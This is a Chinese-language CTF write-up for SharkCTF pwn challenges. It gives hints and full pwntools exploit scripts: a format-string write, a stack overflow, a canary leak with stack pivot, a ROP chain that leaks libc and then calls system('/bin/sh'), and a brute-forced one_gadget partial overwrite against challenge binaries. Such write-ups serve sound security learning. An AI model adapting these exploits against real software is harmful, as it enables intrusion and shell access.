SharkCTF 部分wp

PWN:

Test_Your_nc:

对程序进行逆向后nc输入指定字符串即可

How_2_getshell?:

限制输入长度且比较/bin/sh字符串,输入sh即可

bignum?:

输入-1即可绕过

Cr4zy_Thursday!!!:

64位格式化字符串任意地址写,注意对齐
exp:

from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])

# Local binary for debugging, remote CTF instance for the actual run.
# io=process("./pwn")
io=remote("101.42.30.15",8405)

# gdb.attach(io)
# pause()

# Address that receives the single-byte write (leading zero is harmless: 0x060108C == 0x60108C).
flag_addr=0x060108C

# Builds "%50c%8$hhn": printf emits 50 (0x32) characters, then %hhn stores the low byte
# of the character count through the pointer taken from the 8th positional argument.
# The format string is padded to 16 bytes so the appended p64(flag_addr) sits on an
# 8-byte boundary -- the alignment point the write-up warns about. That the 8th
# argument slot is exactly this qword is assumed from the author's debugging; verify
# with gdb if the binary or the padding changes.
payload="%{}c%{}$hhn".format(0x32,8).encode().ljust(0x10,b"\x00")+p64(flag_addr)

io.send(payload)

io.interactive()

Stack_Overflow:

64位栈溢出
exp:

from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])

# io=process("./pwn")
io=remote("101.42.30.15",8406)


# gdb.attach(io)
# pause()

# 0x28 bytes of cyclic() filler reach the saved return address, which is then
# replaced with 0x400717 (presumably the intended target function from the
# author's reversing -- it is not identified on this page).
payload=cyclic(0x28)+p64(0x400717)
# Wait for the prompt (its text ends in "ght\n") so the payload is not sent early.
io.sendafter(b"ght\n",payload)


io.interactive()

你喜欢金丝雀吗:

出题人的本意应该是好的,编译器执行的更好了
不同以往,程序最后结束的时候进入了另外一个分支:

loc_80486A5:
mov     ecx, [ebp+var_4]        ; ecx <- value of the local slot var_4 (data on the stack)
leave                           ; esp <- ebp ; pop ebp
lea     esp, [ecx-4]            ; esp is recomputed from ecx, i.e. from stack data, not from ebp;
                                ; this looks like the GCC main() epilogue used after stack realignment
retn                            ; returns to whatever [esp] now points at
; } // starts at 80485F9
main endp

通过格式化字符串获取canary和栈地址
获取canary后不能直接溢出写,需要通过控制栈上数据进一步控制寄存器
exp:

from pwn import *
context(log_level='debug',arch='x86',terminal=['tmux','splitw','-h'])

# NOTE: as written this script is in local-debug mode (spawns ./pwn, attaches gdb);
# swap the two io= lines and drop gdb.attach/pause for the remote run.
io=process("./pwn")
# io=remote("101.42.30.15",8407)

gdb.attach(io)
pause()

# Format-string leak: "%15$p" and "%1$p" print the 15th and 1st vararg slots as
# pointers, separated by "."; the string is padded with "." to 16 bytes. On 32-bit
# each "%p" is 10 characters ("0x" + 8 hex digits), hence the recv(10) calls below.
io.sendafter(b"you!!!!!\n",b"%15$p.%1$p".ljust(0x10,b"."))
canary=int(io.recv(10),16)      # slot 15 is the canary per the write-up; confirm with gdb
io.recvuntil(b".")
stack=int(io.recv(10),16)+0x10  # slot 1 is a stack pointer; the +0x10 adjustment is not explained on this page
print("canary: ",hex(canary))
print("stack: ",hex(stack))


# Overflow layout: 8 copies of 0x80485e0, the canary written back into its own slot,
# then the computed stack address three times. The write-up notes that main's
# epilogue loads esp from a stack slot (mov ecx,[ebp+var_4]; lea esp,[ecx-4]), so the
# repeated stack address is presumably what lands in that slot; 0x80485e0 is not
# identified on this page.
payload=p32(0x80485e0)*8+p32(canary)+p32(stack)*3
io.send(payload)

io.interactive()

原神,启动!:

where_to_go可以往栈上读数据,可以布置rop链
dress可以实现栈上写8字节
一开始直接利用栈上写 8 字节的特性修改 ret 地址的低三字节，爆破半字节打 one_gadget。本地 1/16 的概率能出两个，但远端开 4 个终端爆了一晚上都不通，于是改用 ROP 的方式。
总之多调试一下就行了,最后泄露后建议返回main函数,不然寄存器值更改后容易卡住
exp:

from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h',])

# io=process("./ys")
io=remote("101.42.30.15",8408)
# The binary and the matching libc are parsed locally only for symbol/offset lookups;
# all I/O goes to the remote connection above.
elf=ELF("./ys")
libc=ELF("./libc-2.23.so")


pop_rdi=0x4009b3   # "pop rdi ; ret" (see the gadget listing below)
# gdb.attach(io)
# pause()

# Round 1: leak a libc address. The sleep()/recv() pairs pace the dialogue with the
# remote service instead of matching prompts; they are why this script is slow.
# The menu inputs ("10086", the run of 'q', "56") come from the author's analysis of
# the binary's menu and buffer sizes and cannot be derived from this page.
sleep(1)
io.recv()
sleep(1)
io.sendline(b"10086")
sleep(1)
io.recv()
sleep(1)
io.send(b"qqqqqqqqqqqqqqqqqq")
sleep(1)
io.recv()
sleep(1)
# ROP chain placed on the stack via where_to_go (per the write-up): pop rdi <- puts@GOT,
# call puts@PLT to print the resolved puts address, then 0x4008f3 -- presumably the
# return-to-main the write-up recommends. Repeated 5 times to fill the read buffer.
payload=p64(pop_rdi)+p64(elf.got[b"puts"])+p64(elf.plt[b"puts"])+p64(0x4008f3)
io.send(payload*5)
sleep(1)
io.recv()
sleep(1)


# gdb.attach(io)
# pause()

# The 8-byte stack write the write-up calls "dress": "56" selects the slot ("#88" is
# apparently an alternative value the author tried), and 0x400589 is the bare "ret"
# gadget from the listing below -- presumably so execution slides into the chain above.
io.sendline(b"56")  #88
sleep(1)
io.recv()
sleep(1)
io.send(p64(0x400589))

# sleep(1)
# io.recv()
# sleep(1)
# puts prints the 6 significant bytes of a 64-bit libc pointer (the last one is 0x7f);
# take the 6 bytes ending at that marker, zero-pad to 8, unpack little-endian, and
# subtract the puts offset to obtain the libc base.
leak_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))-libc.sym[b"puts"]
print("leak_addr: "+hex(leak_addr))

# Resolve system() and a "/bin/sh" string relative to the leaked base.
sys_addr=leak_addr+libc.sym[b"system"]
str_sh=leak_addr+next(libc.search(b"/bin/sh"))

# gdb.attach(io)
# pause()


# Round 2: same dialogue as above (the program was returned to main), this time with
# a system("/bin/sh") chain; the trailing p64(0) fills the fourth qword of the record.
sleep(1)
io.recv()
sleep(1)
io.sendline(b"10086")
sleep(1)
io.recv()
sleep(1)
io.send(b"qqqqqqqqqqqqqqqqqq")
sleep(1)
io.recv()
sleep(1)
payload=p64(pop_rdi)+p64(str_sh)+p64(sys_addr)+p64(0)
io.send(payload*5)
sleep(1)
io.recv()
sleep(1)

io.sendline(b"56")  #88
sleep(1)
io.recv()
sleep(1)
io.send(p64(0x400589))



io.interactive()


# 0x45226 execve("/bin/sh", rsp+0x30, environ)
# constraints:
#   rax == NULL

# 0x4527a execve("/bin/sh", rsp+0x30, environ)
# constraints:
#   [rsp+0x30] == NULL

# 0xf03a4 execve("/bin/sh", rsp+0x50, environ)
# constraints:
#   [rsp+0x50] == NULL

# 0xf1247 execve("/bin/sh", rsp+0x70, environ)
# constraints:
#   [rsp+0x70] == NULL

# Gadgets information
# ============================================================
# 0x00000000004009ac : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x00000000004009ae : pop r13 ; pop r14 ; pop r15 ; ret
# 0x00000000004009b0 : pop r14 ; pop r15 ; ret
# 0x00000000004009b2 : pop r15 ; ret
# 0x00000000004009ab : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x00000000004009af : pop rbp ; pop r14 ; pop r15 ; ret
# 0x0000000000400670 : pop rbp ; ret
# 0x00000000004009b3 : pop rdi ; ret
# 0x00000000004009b1 : pop rsi ; pop r15 ; ret
# 0x00000000004009ad : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000400589 : ret

# Unique gadgets found: 11

最后还是放一个爆破的脚本:

from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h',])

# Brute-force variant (local only as written): every iteration restarts ./ys and
# retries the partial-overwrite guess described in the write-up (1/16 chance per run).
while True:
    try:
        io=process("./ys")
        # io=remote("101.42.30.15",8408)
        # NOTE(review): elf/libc are not used anywhere in this loop and are re-parsed
        # on every iteration.
        elf=ELF("./ys")
        libc=ELF("./libc-2.23.so")

        # gdb.attach(io)
        # pause()
        sleep(0.5)
        io.recv()
        # sleep(1)
        io.sendline(b"10086")
        sleep(0.5)
        io.recv()
        # sleep(1)
        io.sendline(b"1")
        sleep(0.5)
        io.recv()
        # sleep(1)
        io.sendline(b"88")
        # sleep(1)

        io.recv()
        # sleep(1)
        # sleep(2)
        # Three-byte (little-endian) partial overwrite of the saved return address: the
        # low bits match the 0xf1247 one_gadget offset listed below; the "8" nibble is
        # the guessed ASLR half-byte the write-up mentions.
        io.send(b"\x47\x12\x8f")
        sleep(2)
        io.sendline("ls")   # str rather than bytes; recent pwntools coerces it with a warning -- confirm
        sleep(2)
        ret = io.recv()
        if b"flag" in ret:
            io.sendline("cat flag")
            sleep(1)
            print(io.recv())
            print("SUCCEED")
            # NOTE(review): sys.exit() raises SystemExit, which the bare `except:` below
            # catches, so the loop does not actually stop on success; `except Exception:`
            # would let it exit.
            sys.exit(0)
        else:
            print("FAILED")
            io.close()

    # NOTE(review): bare except also swallows KeyboardInterrupt, and on the first
    # iteration `io` is unbound here if process() itself raised.
    except:
        io.close()
        continue

# 0x45226 execve("/bin/sh", rsp+0x30, environ)
# constraints:
#   rax == NULL

# 0x4527a execve("/bin/sh", rsp+0x30, environ)
# constraints:
#   [rsp+0x30] == NULL

# 0xf03a4 execve("/bin/sh", rsp+0x50, environ)
# constraints:
#   [rsp+0x50] == NULL

# 0xf1247 execve("/bin/sh", rsp+0x70, environ)
# constraints:
#   [rsp+0x70] == NULL